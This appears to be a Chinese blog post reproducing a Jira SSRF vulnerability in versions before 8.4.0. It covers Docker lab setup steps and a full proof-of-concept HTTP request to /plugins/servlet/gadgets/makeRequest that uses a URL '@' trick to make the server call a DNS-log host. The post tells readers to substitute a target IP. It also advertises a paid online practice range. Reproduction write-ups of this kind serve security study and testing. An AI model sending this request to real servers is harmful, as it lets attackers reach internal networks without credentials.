0x00 简介
JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
0x01 漏洞概述
Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。(来自奇安信CERT)
0x02 影响范围
Jira < 8.4.0
0x03 环境搭建
在线靶场
开放时间(当前-9月29日20:00)
获取方式(完成任意一个):
1、将本文转发至朋友圈并配文字,截图发至公众号内
2、联系作者,五元红包
自行搭建
使用docker进行搭建,执行以下命令开启环境
docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
访问ip:8080进行安装
下图选择第二个
继续即可
点击next,后面漏了两张图
去生成JIRA使用许可证
生成之后找到License Key,回到页面填上License Key继续安装
至此,安装完毕。
0x04 漏洞利用
先访问ip:8080,然后刷新抓包
将数据包替换为如下Poc:
GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+ ,application/ ;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.198.133:8080/secure/Dashboard.jspa X-Atlassian-Token: no-check Content-Length: 2
其中ip替换为目标ip,共三处
@后面改为你的dnslog的地址
repeater发包
去dnslog中刷新查看结果,可以看到有流量经过
如果访问未开放端口,结果是这样的:
参考链接:
https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A
https://www.cnblogs.com/houchaoying/p/9096118.html(安装过程)
继续阅读与本文标签相同的文章
上一篇 :
Angular通过指令动态添加组件问题
下一篇 :
微信小程序实现漂亮的弹窗效果
-
AI×5G,智能互联迎来发展新动能
2026-05-14栏目: 教程
-
Y5T289 Infinera今年ECOC推出点对多点相干光模块
2026-05-14栏目: 教程
-
快捷键只懂用复制粘贴?你该进修了,最全Excel快捷键合集
2026-05-14栏目: 教程
-
全网“云南旅游”相关搜索流量排名TOP100 全网“云南旅游”相关搜索流量排行榜
2026-05-14栏目: 教程
-
扎克伯格:现在的首要任务是实施FTC强制实施的隐私计划
2026-05-14栏目: 教程
